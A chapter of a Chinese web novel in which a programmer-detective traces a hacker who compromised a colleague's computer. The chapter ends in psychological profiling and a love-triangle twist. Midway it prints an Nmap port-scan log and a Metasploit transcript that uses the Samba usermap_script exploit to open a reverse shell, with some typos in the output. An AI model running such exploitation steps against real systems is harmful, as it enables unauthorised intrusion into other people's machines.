第62章 黑客的滲透測(cè)試

　　簡(jiǎn)單吃了點(diǎn)東西，拒絕了來(lái)自張昧影去公司游泳館的邀請(qǐng)后，江瀾護(hù)著電腦匆匆回來(lái)房間。

　　此刻他的內(nèi)心有一個(gè)大膽的猜測(cè)，這個(gè)猜測(cè)可能與張凱明的某些話不謀而合。

　　電腦只要能通電就會(huì)說(shuō)話，中了病毒的電腦不僅會(huì)說(shuō)話，甚至還會(huì)RAP。

　　也不知道還能不能再搶救搶救，抱著嘗試一下的心理按下開(kāi)機(jī)鍵。

　　說(shuō)到黑客，就不得不提一款黑客必用的數(shù)字取證操作系統(tǒng)：Kali Linux。

　　但是擅長(zhǎng)使用Kali Linux，并不能證明他就是一位出色的黑客，真正的頂尖黑客們，是在背后編寫(xiě)Kali Linux工具那批人。

　　攻擊李洛甜電腦的病毒亦有異曲同工之妙，厲害點(diǎn)不在欺騙，而是在欺騙后精準(zhǔn)地銷(xiāo)毀與迷惑般留下線索。

　　沒(méi)有虛擬機(jī)，江瀾字號(hào)訪問(wèn)網(wǎng)址，輸入JS/UIX-Terminal，進(jìn)入點(diǎn)擊open terminal，立馬提供了一個(gè)非常簡(jiǎn)單的終端環(huán)境。

　　“shell腳本有了?！?p>　　很快，便尋找道對(duì)方的漏洞攻擊點(diǎn)，也就是病毒的入侵點(diǎn)。

　　繼續(xù)查探到滲透工具Nessus，江瀾找到了對(duì)方留下來(lái)的線索。

　　Nessus可以幫助操作者找到潛在攻擊者利用到的漏洞，這個(gè)線索與被黑客抹去的其他操作痕跡有巨大差別。

　　也算是給江瀾的挑釁，仿佛在說(shuō)：“我來(lái)無(wú)影去無(wú)蹤，在你面前秀完一手，你也只有看的份。”

　　張凱明不會(huì)這么囂張，也不會(huì)無(wú)聊到認(rèn)為李洛甜可以看明白這種暗示。

　　當(dāng)然了，這名黑客對(duì)自己有著爆棚般的信心與技術(shù)，以至于忽略了雇主要求他做到不露聲色的要求。

　　依照推理，這名黑客在攻擊李洛甜的電腦時(shí)，大概率知道自己會(huì)插手這件事情，留下挑戰(zhàn)信的他必定也知道自己的身份。

　　初步結(jié)論，對(duì)方依然是騰升內(nèi)部技術(shù)人員。

　　在那個(gè)猜測(cè)面前，得出這個(gè)結(jié)論毫無(wú)意義，只有事實(shí)才能撥開(kāi)迷霧。

　　很快江瀾得知，這臺(tái)電腦被盯上只是這兩天的事情，仔細(xì)核對(duì)了下時(shí)間，是自己剛到騰升總部那天。

　　從那時(shí)候起，這臺(tái)電腦便在李洛甜毫不知情的情況下被控制，信息被竊取，行為也受到了監(jiān)控。

　　那時(shí)候的時(shí)間是上午11點(diǎn)42分，五人小隊(duì)剛成立不多久。

　　與自己的猜測(cè)時(shí)間相吻合，這一切都是在自己進(jìn)入馬云騰視線后發(fā)生的，想到這里江瀾有些毛骨悚然。

　　作為靶機(jī)，這臺(tái)電腦有諸多漏洞，江瀾先是使用Nmap的掃描得出：

　　Completed NSE at 11:42，0.00s elapsed

　　Initiating ARP Ping Scan at 11:42

　　Scanning target (192.168.122.102)[1 port]

　　Completed ARP Ping Scan at11:42，0.01s elapsed (1 total hosts)

　　Initiating SYN Stealth Scan at 11:42

　　Scanning target (192.168.122.102)[65535 ports]

　　Discovered open port 5900/tcp on 192.168.122.102

　　Discovered open port 22/tcp on 192.168.122.102

　　Discovered open port 25/tcp on 192.168.122.102

　　Discovered open port 445/tcp on 192.168.122.102

　　Discovered open port 21 /tcp on 192.168.122.102

　　Discovered open port 3360/tcp on 192.168.122.102

　　Discovered open port 23/tcp on 192.168.122.102

　　Discovered open port 80tcp on 192.168.122.102

　　Discovered open port 111/tcp on 192.168.122.102

　　Discovered open port 139/tcp on 192.168.122.102

　　Discovered open port 53/tcp on 192.168.122.102

　　Discovered open port 8180/tcp on 192.168.122.102

　　Discovered open port 3632/tcp on 192.168.122.102

　　Discovered open port 2121/tcp on 192.168.122.102

　　Discovered open port 6667/tcp on 192.168.122.102

　　Discovered open port 6000/tcp on 192.168.122.102

　　Discovered open port 5432/tcp on 192.168.122.102

　　而后使用Metasploit：

　　root@kali:~# msfconsole

　　Taking notes in notepad?Have Metasploit Pro track & report

　　Your progrss and findings -- learn more on htt.p

　　=[metasploit v4 .12.23-dev]

　　+----=[1577 exploits-907 auxiliary-272 post]

　　+----=[455 payloads-39 encoders-8 nops]

　　+----=[Free Metasploit pro trial :ht.tp//*******r-7.vo/trymsp]

　　Msf＞

　　.....

　　接下來(lái)，便取得對(duì)方的Shell

　　Exploit target

　　ID--- Name

　　The Dark Knight

　　Msf exploit（usermap_script）＞exploit

　　[*]Started reverse TCP double handler on 192.168.122.101:666

　　[*]Accepted the first client connection...

　　[*]Accepted the secind client connection...

　　[*]Command：echo 10oZ6jj5y4tAaWy5

　　[*]Writing to socket A

　　[*]Writing to socket B

　　[*]Reading from sockets...

　　[*]Reading from sockets B

　　[*]B:“10oZ6jj5y4tAaWy5/r/n”

　　[*]Matching

　　[*]A IS input...

　　[*]Command shell session 1 opened(192.168.122.101:666-＞192.168.122.102:50823）at 2020-5-8 00:07:10-0500

　　這個(gè)漏洞實(shí)在是有點(diǎn)舊了，往前追溯可以到2005年，但它就是真實(shí)發(fā)生了。

　　對(duì)方的ID為T(mén)he Dark Knight，但這種行為可不像是蝙蝠俠干的事情。

　　當(dāng)然江瀾也不覺(jué)得對(duì)方會(huì)直接使用自己真實(shí)姓名的拼音縮寫(xiě)來(lái)作為ID，層層剝絲，還真有點(diǎn)攻堅(jiān)對(duì)戰(zhàn)的意思。

　　想到上次追到一半電腦彈出的那幾個(gè)紅色大字，就知道這人不甘心只收錢(qián)做事，他喜歡挑戰(zhàn)，更確切點(diǎn)來(lái)說(shuō)，他靠擊敗別人激發(fā)身體的歡愉感，這種感覺(jué)比金錢(qián)更讓他感到滿足。

　　心理學(xué)上稱(chēng)這種行為為：馬斯洛的需求層次。

　　這個(gè)心理學(xué)的經(jīng)典理論適用于世界上任何一個(gè)人，基本內(nèi)容是將人的需求從低到高一次分為：生理需求、安全需求、社交需求、尊重需求和自我實(shí)現(xiàn)需求。

　　對(duì)應(yīng)黑客的行為，大多數(shù)是‘尊重需求’+‘自我實(shí)現(xiàn)需求’。

　　前者是要得到內(nèi)在價(jià)值的肯定以及外在成就的認(rèn)可，關(guān)鍵詞是：成就、尊重、自信、自尊。

　　而后者‘自我實(shí)現(xiàn)需求’，則是在他充分發(fā)揮自己的能力后，實(shí)現(xiàn)理想抱負(fù)，關(guān)鍵詞是：夢(mèng)想、創(chuàng)造力、自發(fā)性、解決問(wèn)題、能力。

　　通過(guò)簡(jiǎn)單的分析，這名黑客的心理畫(huà)像便出來(lái)了。

　　“他很想證明自己，雖然行為乖張，卻隱藏著一股自負(fù)，說(shuō)明他曾經(jīng)失敗過(guò)，還是無(wú)法挽回的重大失誤?！?p>　　“他需要擊敗一個(gè)強(qiáng)者，可在這種心理下卻沒(méi)有按照自己意想而任意妄為，說(shuō)明幕后主使者對(duì)他拿捏有方?！?p>　　“從輸入方式與某些點(diǎn)醒且頻繁的小習(xí)慣上不難看出，他患有極度嚴(yán)重的強(qiáng)迫癥?！?p>　　“ID NAME 以蝙蝠俠外號(hào)The Dark Knight自居，行為上卻對(duì)自己純白無(wú)辜的同事下手，遇到破解者頓時(shí)興奮，發(fā)出的警告詞頗具挑逗，技術(shù)手段高超，還熟悉公司內(nèi)部所有網(wǎng)絡(luò)環(huán)境......”

　　“.....”

　　所有已知信息加在一起，江瀾腦海中浮現(xiàn)出一個(gè)虛構(gòu)的概念人物。

　　記憶再回到馬云騰身上，時(shí)間回到辦公室，那時(shí)候的張凱明高瘦，情緒極度不穩(wěn)定，面帶痤瘡，這是典型的肝臟解毒功能減退，內(nèi)分泌失調(diào)，程序員的通病。

　　更惹人注目的是，觀察到他左手袖的紐扣線頭松動(dòng)，是曾經(jīng)與硬物摩擦碰撞動(dòng)過(guò)的痕跡。

　　碰巧馬云騰的袖口紐扣亦是如此，殘留的小半條斷衣線明顯來(lái)自張凱明。

　　看樣子不是打架，更像是激烈的擁抱。

　　在張凱明剛進(jìn)辦公室與馬云騰打招呼的時(shí)候，他右手捏成拳頭，眼神充滿敵意，說(shuō)話時(shí)，有種不怕冒犯對(duì)方的感覺(jué)，說(shuō)明兩人有過(guò)私下之交，且來(lái)往密切。

　　而關(guān)于張凱明對(duì)公司的吐槽，就更加值得推敲。

　　與其說(shuō)是他從業(yè)多年以來(lái)的積壓爆發(fā)，不如說(shuō)是他對(duì)自己與馬云騰關(guān)系的暗諷發(fā)泄。

　　到這里，

　　江瀾才發(fā)現(xiàn)故事的背后是場(chǎng)凄美的三角戀。

　　這樣一來(lái)，所有問(wèn)題都能夠解釋的通，起因不過(guò)是新歡與舊愛(ài)的交替使勁。

　　可...與自己又有什么關(guān)系？

　　還有比特幣的交易與走向，馬云騰是否真的不知情？

　　這幾千萬(wàn)的背后，還有什么大的陰謀。

　　房間燈光橘黃通亮，就在江瀾思緒亂飛時(shí)，背后門(mén)外走廊傳來(lái)了腳步聲......